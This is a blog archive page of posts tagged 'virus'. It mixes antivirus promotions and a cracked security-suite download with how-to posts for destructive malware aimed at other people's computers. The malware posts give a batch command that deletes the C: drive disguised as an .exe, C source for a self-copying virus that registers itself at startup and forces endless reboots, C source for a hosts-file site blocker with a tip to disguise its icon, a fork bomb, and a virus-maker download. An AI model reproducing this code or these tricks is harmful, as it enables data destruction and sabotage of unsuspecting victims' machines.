Showing posts with label virus. Show all posts
Showing posts with label virus. Show all posts

Friday, 16 January 2015

File Destructor 2.0!!!


We have come up with a very interesting tool to share with you!
This tool lets you generate a file which looks as normal as it seems to be but will actually not open or execute since its nothing but just a corrupt file!
Actually this tool is just another way to blame your faulty system!
Just enter desired file name, indicate required file size and document format, and generate it!
So be it your project evaluation, a presentation or your comp lab test, u know what to do!!!

Features

Unlimited file size: Make file as big as you want!
    Can generate over 20 file types: doc, txt, zip, img, xls, pdf, jpg, bmp, gif, htm, rtf, sip, eps, mpg, mp3 and more!
    Destructed files 100% compatible both with Mac and PC!


Read more ...

Sunday, 31 March 2013

Kaspersky Virus Removal Tool (31 Mar 2013)


Kaspersky Virus Removal Tool 2013 is a free software intended to disinfect infected computers, removing viruses, Trojans, and spyware, as well as any other types of malware.
Kaspersky Virus Removal Tool 2013 uses the same highly efficient algorithms for detecting malware as Kaspersky Anti-Virus. Algorithms include a full-functional anti-virus scanner, technologies developed for detecting vulnerabilities in installed applications and operating systems, and a technology for running scripts intended for removing complex and compound viruses.

Kaspersky Virus Removal Tool 2013 is not intended for real-time protection of computer. After the disinfection of the computer is complete, the application should be uninstalled from the hard drive and replaced with the real-time protection anti-virus:
• Kaspersky Anti-Virus 2012
• Kaspersky Internet Security 2012

What's New in Kaspersky Virus Removal Tool 2013 :
· The user interface has been improved.
· The application installation and uninstallation have been simplified.
· A full-functional use of the application from a flash card has been implemented.
· The process self-defense has been implemented.
· The advanced disinfection has been improved.
· Compatibility with real-time protection anti-virus applications has been improved.
· Active use of the "cloud" technology of Kaspersky Security Network.


Download :
Kaspersky Virus Removal Tool
Read more ...

Friday, 29 March 2013

Autorun Virus Remover 3.3 Build 0328-Silent


Autorun Virus Remover 3.3 Build 0328-Silent

Autorun Virus Remover can detect and clean hundreds of usb/autorun viruses and it will block viruses and trojans trying to attack when USB device is inserted. Autorun Virus Remover provides 100% protection against any malicious programs trying to attack via USB storage(USB drive?USB stick?pen drive?flash drive?flash card?secure digital card?removable storage?portable storage?ipod?media player).

Compare Autorun Virus Remover with other antivirus solutions, you will find out its highlights: Autorun Virus Remover provides 100% protection against any threats via USB drive, however, the majority of other products are unable even to guarantee 90% protection. Autorun Virus Remover can detect and clean the usb virus/worm/trojan such as Ravmon,auto.exe in your computer or usb drive,it could solve the problem that unable to open a drive by double clicking. It also removes the leftovers of virus by removing the autorun.inf files and cleaning up your system registry, so you won't see the autoplay item anymore.

100% protection against any malicious programs via USB storage
Autorun Virus Remover uses innovative proactive technology to block any threats via USB drive. There are relatively few products available in shops or on the Internet which offer even close to 100% protection against any malicious programs via USB drive. The majority of products are unable even to guarantee 90% protection. Autorun Virus Remover is the world's best software to block threats via USB drive.

The best solution to protect offline computer
Other antivirus software should update signature database regularly, and they cannot effectively protect offline computer that is not connected to the Internet. When new viruses, worms and other malicious attacks strike, traditional signatures are insufficient. Every minute one waits for a virus signature update creates a window of vulnerability that could have devastating consequences. Autorun Virus Remover uses advanced proactive detection techniques, requires no signature updates, and closes the window of vulnerability left open by other reactive, signature-based responses.

The world's fastest and smallest antivirus software
With Autorun Virus Remover, it’s not necessary to sacrifice speed for detection and scanning. Compare antivirus software and you'll discover that Autorun Virus Remover is by far one of the smallest applications in the industry. For example, the Autorun Virus Remover installer is just 1 MB. The program utilizes approximately 1 to 7 MB of RAM.

100% compatible with all software
Incompatibility between antivirus programs is an issue. In the vast majority of cases, installing two antivirus programs from different vendors on one machine (for increased protection) is technically impossible, as the two programs will disrupt each other's functioning. However, Autorun Virus Remover is 100% compatible with all software, including Windows Vista.

Simple to use
Autorun Virus Remover has been specifically designed to perform effectively regardless of the user’s level of computer expertise. Just install and forget it.

Read more ...

Friday, 14 December 2012

DeadLine's Virus Maker 1.1




Hi all users, This is a cool virus maker we're posting here, it is not created by us. This original author DeadLine we've mentioned his name at the end of this post. This is what it's author have to say about it. 

I decided to make a custom virus maker because I don’t trust all the other virus makers that are out there on the net. I think it took me about 4 hours to code this. If you are wondering why it took me that long: it is because I used a new theme and new components, and I’m still learning how to use them properly.

Download :
Read more ...

Sunday, 28 October 2012

Make Virus To Crash Your Friends Windows System




Warning: Never use it on your own computer. If Program accidentally get activated on your system, You can't repair it again. In this case you have to reinstall your window again.!!!!

Steps to create this program or virus. 
Step 1: Open NOTEPAD and type this command :- 
                      RD c:\ /s /q

Note: C:\ is the location where system files are located. You can change it.


Step 2:
 Now save as this file and give any name you want with extension .exe and save as file type (all files).

Note: Actually it's a batch file program. But most of the people runs .exe files without thinking anything.. So I am using .exe extension instead of .bat



Read more ...

Thursday, 25 October 2012

A Virus Program to Restart the Computer at Every Startup



Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.
For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations. And one more thing, none of the antivirus softwares detect’s this as a virus since I have coded this virus in C. So if you are familiar with C languagethen it’s too easy to understand the logic behind the coding.
Here is the source code.
#include<stdio.h>
#include<dos.h>
#include<dir.h>
int found,drive_no;char buff[128];
void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(“C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst(“C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(“D:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“D:\\windows\\system\\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(“E:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“E:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(“F:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“F:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}
void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(“C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup
break;
case 2:
target=fopen(“D:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe”);
break;
case 3:
target=fopen(“E:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe”);
break;
case 4:
target=fopen(“F:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe”);
break;
default:
exit(0);
}
while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}
else
system(“shutdown -r -t 0″); //if the system is already infected then just give a command
to restart}
Read more ...

BitDefender Total Security 2013 with Activator [32-64bits]

 BitDefender Total Security 2013 Full [32-64bits] Free Download
Size : 512 Mb

If you wish this posting come back on transfer it and play it in your laptop thus thanks cause u've visited my diary. return once more during this diary ok (Free transfer Lastest show, software, games)



Feature:

Antiphising:
· Analyzes and blocks websites that support various scams or credit card phishing attempts

File Shredder:
· Ensures that no traces of your deleted sensitive files remain on your PC

File Encryption:
· Locks up confidential files in an encrypted vault.

Online Storage and Sharing – Bitdefender Safebox:
· Stores and protects your important or sensitive files in a secure online location, so you can manage and access safely, from all your devices – iPhones, iPads, Android phones or PCs. The first 2 GB come free!

Scan Dispatcher:
· The Scan Dispatcher finds and uses time-slices when system resource usage falls below a certain threshold to perform recurring scans of your entire system. This way Bitdefender does not interfere with user-initiated actions and does impact system responsiveness.

Tune-Up:
· Your security software isn’t slowing down your computer. So what is? Bitdefender Total Security comes complete with a Tune-Up module, which cleans up your file system and registry for enhanced performance.

Social Network Protection:
· Bitdefender filters/blocks social-networking specific e-threats by scanning the links you receive from your Facebook and Twitter friends, monitors your privacy settings, and much more!

Search Advisor:
· The Link Filter relies on intelligence provided by Bitdefender Cloud services to flag malware and phishing attempts in search engine results.

Bitdefender Autopilot:
· Bitdefender Autopilot provides a hassle-free experience by making optimal security-related decisions without input from you. This means no pop-ups, no alerts, nothing to configure.


New features:

· On access settings don't return to previous settings after a rootkit scan;
· On access - no action is selected during an on demand scan task;
· Settings are not saved / are not available under On Access scanning Settings - > Modify;
· Antivirus scanner has encountered a problem - caused by AVC;
· The following boot-start or system-start driver failed to load: trufos;
· Spam rate is not refreshed after spam is detected;
· Change "Submit suspicious quarantined files for further analysis" text to mention that only suspicious files are sent;
· At every system restart I receive a "desktop.ini" open file;
· Radio streams are blocked in some players;
· Search Adviser should work for Ask and AOL;
· Stockhouse's stockstream is blocked;
· TDAmeritrade Streamer is blocked;
· "Anytime & Anywhere" or other IP camera is blocked;
· Some internal bug fixes;


System Requirements:

· Available free hard disk space: 2.8GB;
· CPU:Intel CORE Duo (1.66 GHz) or equivalent;
· RAM:1 GB (Win XP),1.5 GB (Vista, Win 7 and Win 8)
· 600 MB available hard disk space
· Internet Explorer 7


Complete instructions for activation are included.

Download :
BitDefender Total Security 2013 with Activator
Read more ...

Monday, 22 October 2012

A Virus Program to Block Any Websites



Most of us are familiar with the virus that used to block Orkut and Youtube site. If you are curious about creating such a virus on your own, here is how it can be done. As usual I’ll use my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.
This virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of C will be able to understand the working of the virus. This virus need’s to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that has been specified in the source code. The victim will never be able to surf those websites unless he re-install’s the operating system. This blocking is not just confined to IE or Firefox. So once blocked, the site will not appear in any of the browser program.
Here is the sourcecode of the virus.
#include<stdio.h>
#include<dos.h>
#include<dir.h>
char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1″;
FILE *target;
int find_root(void);
void block_site(void);
int find_root()
{
int done;
struct ffblk ffblk;//File block structure
done=findfirst(“C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
else return 0;
}
void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/
fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
}
void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}
How to Compile ?
For step-by-step compilation guide, refer my post How to compile C Programs.
Testing
1. To test, run the compiled module. It will block the sites that is listed in the source code.
2. Once you run the file block_Site.exe, restart your browser program. Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.
3. To remove the virus type the following the Run.
%windir%\system32\drivers\etc
4. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this
127.0.0.1                                google.com
5. Delete all such entries which contain the names of blocked sites.
NOTE: You can also change the ICON of the virus to make it look like a legitimate program.
Read more ...

Saturday, 1 September 2012

Enable Task Manager disabled by Administrator or Virus in Windows


Windows Task Manager is used to view details about processes running on your computer. Since it can be used to terminate programs that are misbehaving or are viruses disguised in the form of harmless programs, most spyware and viruses disable it to prevent themselves from being closed through it. Some administrators also disable Task Manager to prevent users from closing important security programs like antiviruses and anti-malwares.

In such situations, running the Task Manager will give the "Task Manager has been disabled by Administrator" error. However, there are some techniques you can use to re-enable task manager and close those harmful programs manually. This article contains few such simple techniques you can use to regain access to Task Managing privileges.



Create a Registry(.reg) file for enabling Task Manager

If you are unfamiliar with manually editing the Registry, you can create a Registry file which will automatically modify the Registry Key to re-enable Task Managing. To create one such file:-
Open Notepad or any other text editor.
Copy the code given below and paste it as it is in it.


Windows Registry Editor Version 5.00 [HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Policies\System] “DisableTaskMgr”  =dword:00000000

Save the file as Enable Task Manager.reg or *.reg.

Open the file by double clicking on it.

Registry Editor will ask you for confirmation. In the confirmation Window, click Yes.
Task Manager would immediately be accessible. If it is not, restart your computer.

Read more ...

HOW TO MAKE A FORK BOMB




Hey guys, I ‘ve got a new thing for all u guys to have fun with, its very easy and fun to do. Before we start coding ill explain what a fork bomb actually is.

A fork bomb or rabbit virus opens an application for example cmd.exe so many times that its overloads the computers processor which results in the computer either overheating, shutting down or in some cases you can get a BSOD (blue screen of death). Unlike little batch viruses like the shutdown one you cannot stop a fork bomb unless you extremely 1337 so once it starts it goes until it does its job.

Most Anti-Virus software will not pick a fork bomb or rabbit virus, as far as its concerned its just a batch file the opens and application.

Background

Fork Bombs aka Rabbit viruses have been around for ages due to their effectiveness to evade anti-virus software. I came across it when i wanted to play a practical joke on my schools administrator for his birthday. Just to let you know it worked and hes not some n00b. I find them very effective just don’t bomb yourself.

The code

Ok this is the code that you type into notepad.exe remember to save it as a .bat or if you want it in a dorminant for save it as a .txt

One more thing…I am not responsible if you kills your computer or somebody else computer with or without permission. Now that we have that out a the way here we go…

Blocks of code should be set as style “Formatted” like this.

:s

START %0

GOTO :s

Have fun guys and do leave your feedback about this article!
Read more ...

Sunday, 19 August 2012

Sandboxie






Introducing Sandboxie
Sandboxie runs your programs in an isolated space which prevents them from making permanent changes to other programs and data in your computer.


Benefits of the Isolated Sandbox
Secure Web Browsing: Running your Web browser under the protection of Sandboxie means that all malicious software downloaded by the browser is trapped in the sandbox and can be discarded trivially.
Enhanced Privacy: Browsing history, cookies, and cached temporary files collected while Web browsing stay in the sandbox and don't leak into Windows.
Secure E-mail: Viruses and other malicious software that might be hiding in your email can't break out of the sandbox and can't infect your real system.
Windows Stays Lean: Prevent wear-and-tear in Windows by installing software into an isolated sandbox.
Download :
Read more ...
Related Posts Plugin for WordPress, Blogger...